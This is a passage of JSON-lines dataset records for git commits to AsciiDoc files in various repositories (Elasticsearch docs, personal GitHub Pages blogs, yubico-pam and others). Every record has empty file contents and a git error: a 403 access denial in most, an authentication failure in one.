CHANGELOG\n","repos":"ninenines\/ranch,layerhq\/ranch,K2InformaticsGmbH\/ranch","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/K2InformaticsGmbH\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"bdc1d7b01d91e9cc4ce7dd4a76937f2c9603d50d","subject":"postman collection updated","message":"postman collection updated\n","repos":"dsilahcilar\/spring-examples,dsilahcilar\/spring-rest","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsilahcilar\/spring-rest.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e443bfc492ed3a07a8d22ee98fb52264ef0e39d5","subject":"docs: fix callouts","message":"docs: fix callouts\n","repos":"coding0011\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,episerver\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,myelin\/elasticsearch,mmaracic\/elasticsearch,nknize\/elasticsearch,markharwood\/elasticsearch,cwurm\/elasticsearch,nezirus\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,cwurm\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,ricardocerq\/elasticsearch,LewayneNaidoo\/elasticsearch,mapr\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,jchampion\/elasticsearch,ricardocerq\/elasticsearch,JervyShi\/elasticsearch,nomoa\/elasticsearch,andrejserafim\/elasticsearch,yynil\/elasticsearch,markwalkom\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,palecur\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elasticsearch,artnowo\/elasticsearch,davidvgalbraith\/elasticsearch,wangtuo\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,xuzha\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,trangvh\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,pozhidaevak\/elasticsearch,kaneshin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,brandonkearby\/elasticsearch,clintongormley\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,rhoml\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,diendt\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,yynil\/elasticsearch,fred84\/elasticsearch,sreeramjayan\/elasticsearch,AndreKR\/elasticsearch,mmaracic\/elasticsearch,markharwood\/elasticsearch,nknize\/elasticsearch,palecur\/elasticsearch,awislowski\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,palecur\/elasticsearch,awislowski\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,ricardocerq\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,gmarz\/elasticsearch,mmaracic\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,ivansun1010\/elasticsearch,trangvh\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,sreeramjayan\/elasticsearch,episerver\/elasticsearch,dpursehouse\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,F0lha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rmuir\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,xuzha\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,jbertouch\/elasticsearch,girirajsharma\/elasticsearch,pozhidaevak\/elasticsearch,zkidkid\/elasticsearch,fforbeck\/elasticsearch,AndreKR\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,scorpionvicky\/elasticsearch,yynil\/elasticsearch,JSCooke\/elasticsearch,dongjoon-hyun\/elasticsearch,gfyoung\/elasticsearch,yynil\/elasticsearch,avikurapati\/elasticsearch,markharwood\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,rhoml\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,martinstuga\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,F0lha\/elasticsearch,snikch\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,camilojd\/elasticsearch,martinstuga\/elasticsearch,polyfractal\/elasticsearch,ivansun1010\/elasticsearch,awislowski\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,myelin\/elasticsearch,kaneshin\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,rmuir\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,gmarz\/elasticsearch,myelin\/elasticsearch,dpursehouse\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,fforbeck\/elasticsearch,camilojd\/elasticsearch,mapr\/elasticsearch,JSCooke\/elasticsearch,maddin2016\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,andrejserafim\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,geidies\/elasticsearch,diendt\/elasticsearch,Stacey-Gammon\/elasticsearch,martinstuga\/elasticsearch,myelin\/elasticsearch,MaineC\/elasticsearch,zkidkid\/elasticsearch,LeoYao\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,mapr\/elasticsearch,F0lha\/elasticsearch,gfyoung\/elasticsearch,mapr\/elasticsearch,alexshadow007\/elasticsearch,cwurm\/elasticsearch,nomoa\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,avikurapati\/elasticsearch,kaneshin\/elasticsearch,avikurapati\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,sreeramjayan\/elasticsearch,cwurm\/elasticsearch,davidvgalbraith\/elasticsearch,ricardocerq\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,dongjoon-hyun\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,LewayneNaidoo\/elasticsearch,trangvh\/elasticsearch,avikurapati\/elasticsearch,martinstuga\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,liweinan0423\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,awislowski\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,AndreKR\/elasticsearch,pozhidaevak\/elasticsearch,AndreKR\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,rlugojr\/elasticsearch,snikch\/elasticsearch,rhoml\/elasticsearch,xuzha\/elasticsearch,scorpionvicky\/elasticsearch,camilojd\/elasticsearch,zkidkid\/elasticsearch,myelin\/elasticsearch,polyfractal\/elasticsearch,fernandozhu\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,ivansun1010\/elasticsearch,martinstuga\/elasticsearch,jchampion\/elasticsearch,rlugojr\/elasticsearch,diendt\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,mapr\/elasticsearch,spiegela\/elasticsearch,camilojd\/elasticsearch,rhoml\/elasticsearch,mikemccand\/elasticsearch,kaneshin\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,snikch\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,yynil\/elasticsearch,davidvgalbraith\/elasticsearch,nomoa\/elasticsearch,ESamir\/elasticsearch,mortonsykes\/elasticsearch,JervyShi\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,camilojd\/elasticsearch,avikurapati\/elasticsearch,polyfractal\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,polyfractal\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,jpountz\/elasticsearch,sreeramjayan\/elasticsearch,mmaracic\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,sneivandt\/elasticsearch,mmaracic\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,tebriel\/elasticsearch,palecur\/elasticsearch,tebriel\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,a2lin\/elasticsearch,clintongormley\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,mohit\/elasticsearch,episerver\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,mikemccand\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,yanjunh\/elasticsearch,jchampion\/elasticsearch,mortonsykes\/elasticsearch,nomoa\/elasticsearch,fforbeck\/elasticsearch,zkidkid\/elasticsearch,mmaracic\/elasticsearch,andrejserafim\/elasticsearch,ESamir\/elasticsearch,girirajsharma\/elasticsearch,camilojd\/elasticsearch,liweinan0423\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,jpountz\/elasticsearch,davidvgalbraith\/elasticsearch,vroyer\/elasticassandra,dpursehouse\/elasticsearch,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,nomoa\/elasticsearch,jimczi\/elasticsearch,polyfractal\/elasticsearch,F0lha\/elasticsearch,i-am-Nathan\/elasticsearch,rmuir\/elasticsearch,episerver\/elasticsearch,MisterAndersen\/elasticsearch,jpountz\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,polyfractal\/elasticsearch,nilabhsagar\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,rhoml\/elasticsearch,scottsom\/elasticsearch,ivansun1010\/elasticsearch,ZTE-PaaS\/elasticsearch,yanjunh\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,diendt\/elasticsearch,snikch\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,yynil\/elasticsearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,trangvh\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra5-rc,elasticdog\/elasticsearch,kalimatas\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,ESamir\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,nazarewk\/elasticsearch,mapr\/elasticsearch,ESamir\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,davidvgalbraith\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,jbertouch\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,robin13\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,strapdata\/elassandra5-rc,LeoYao\/elasticsearch,robin13\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,rmuir\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,markharwood\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,martinstuga\/elasticsearch,JackyMai\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra5-rc,diendt\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,a2lin\/elasticsearch,tebriel\/elasticsearch,Stacey-Gammon\/elasticsearch,episerver\/elasticsearch,markharwood\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,jchampion\/elasticsearch,wuranbo\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,clintongormley\/elasticsearch,andrejserafim\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,F0lha\/elasticsearch,artnowo\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,rmuir\/elasticsearch,rajanm\/elasticsearch,tebriel\/elasticsearch,JSCooke\/elasticsearch,ESamir\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,clintongormley\/elasticsearch,s1monw\/elasticsearch,gmarz\/elasticsearch,xuzha\/elasticsearch,masaruh\/elasticsearch,kaneshin\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,diendt\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,jpountz\/elasticsearch,F0lha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,snikch\/elasticsearch,snikch\/elasticsearch,mohit\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,girirajsharma\/elasticsearch,dongjoon-hyun\/elasticsearch,sreeramjayan\/elasticsearch,jimczi\/elasticsearch,markharwood\/elasticsearch,yanjunh\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,ESamir\/elasticsearch,JackyMai\/elasticsearch,jbertouch\/elasticsearch,xuzha\/elasticsearch,jchampion\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,elasticdog\/elasticsearch,ivansun1010\/elasticsearch,gingerwizard\/elasticsearch,jpountz\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,jbertouch\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/reference\/search\/field-stats.asciidoc","new_file":"docs\/reference\/search\/field-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec25a85c76cc9bba6ae6c104d495668c54967c4a","subject":"link to final releases","message":"link to final releases\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.1.adoc","new_file":"download\/releaseNotes\/releaseNotes6.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de96386ac9e7dddacc7fde22542d5d95119eb48","subject":"Update 2016-09-16-Profiles.adoc","message":"Update 2016-09-16-Profiles.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-16-Profiles.adoc","new_file":"_posts\/2016-09-16-Profiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cbcd5569dfe38de699d61fd0ecc4dfbf8f04f26","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764686292ef605c9568c34a1e7558636812f3a3d","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb12f84183d31b00b7746e974c6535a37dad23de","subject":"y2b create post The Worst Gadget EVER On Unbox Therapy...","message":"y2b create post The Worst Gadget EVER On Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-19-The%20Worst%20Gadget%20EVER%20On%20Unbox%20Therapy....adoc","new_file":"_posts\/2018-02-19-The%20Worst%20Gadget%20EVER%20On%20Unbox%20Therapy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f9255763279d88b33d66b11911e0c9ab86b1cc9","subject":"Update 2015-07-16-Bug-Defense.adoc","message":"Update 2015-07-16-Bug-Defense.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-Bug-Defense.adoc","new_file":"_posts\/2015-07-16-Bug-Defense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d426e09ab14ab55e5dbf207caad0105be1adc2","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58713cbe1c87d95868abde95c5e563003def59a3","subject":"Update 2016-09-11-Math-Proofs.adoc","message":"Update 2016-09-11-Math-Proofs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-11-Math-Proofs.adoc","new_file":"_posts\/2016-09-11-Math-Proofs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"043c9ffa8589f368b30c2bb8ba203edbeb510471","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"145ee104e5d2bad517a891b5468b2cdfbd56da95","subject":"Update Two_Factor_PAM_Configuration.adoc","message":"Update Two_Factor_PAM_Configuration.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a9b82c7f31156d18070a03c44d2b82d30c5f1ba1","subject":"Finished move constructor section (references pending)","message":"Finished move constructor section (references pending)\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5df5f21b83a32d1176955eef1c86dc027f6d6f3d","subject":"HashMap","message":"HashMap\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"HashMap.adoc","new_file":"HashMap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df44895d2df255814aaaee584a70df9f1de26a33","subject":"y2b create post iPhone 7 Earpods - Are These Legit?","message":"y2b create post iPhone 7 Earpods - Are These Legit?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-17-iPhone-7-Earpods--Are-These-Legit.adoc","new_file":"_posts\/2016-08-17-iPhone-7-Earpods--Are-These-Legit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdaa3e7031dbdf57d0d44b08a20517b89be18585","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67a6e870f133cd1e5e066a147e1c6a0e99ed5bda","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"db7a135432039c863fdbfc63c19a30a2e0116636","subject":"Update 2018-08-03-Docker-Artifactory-Migration.adoc","message":"Update 2018-08-03-Docker-Artifactory-Migration.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-03-Docker-Artifactory-Migration.adoc","new_file":"_posts\/2018-08-03-Docker-Artifactory-Migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d959d9f4b5d6348e7aa2763dbb94e5d5c9abd93b","subject":"y2b create post The iPhone Lighter Case?","message":"y2b create post The iPhone Lighter Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-05-The-iPhone-Lighter-Case.adoc","new_file":"_posts\/2015-11-05-The-iPhone-Lighter-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e206eae1c85f8631ada43c3c787c9315f3cbef0b","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae6c48a04eda4db4519fbf21dc3234baae6b885","subject":"Delete the file at '2012-12-1-Frisbeens-historie.adoc'","message":"Delete the file at 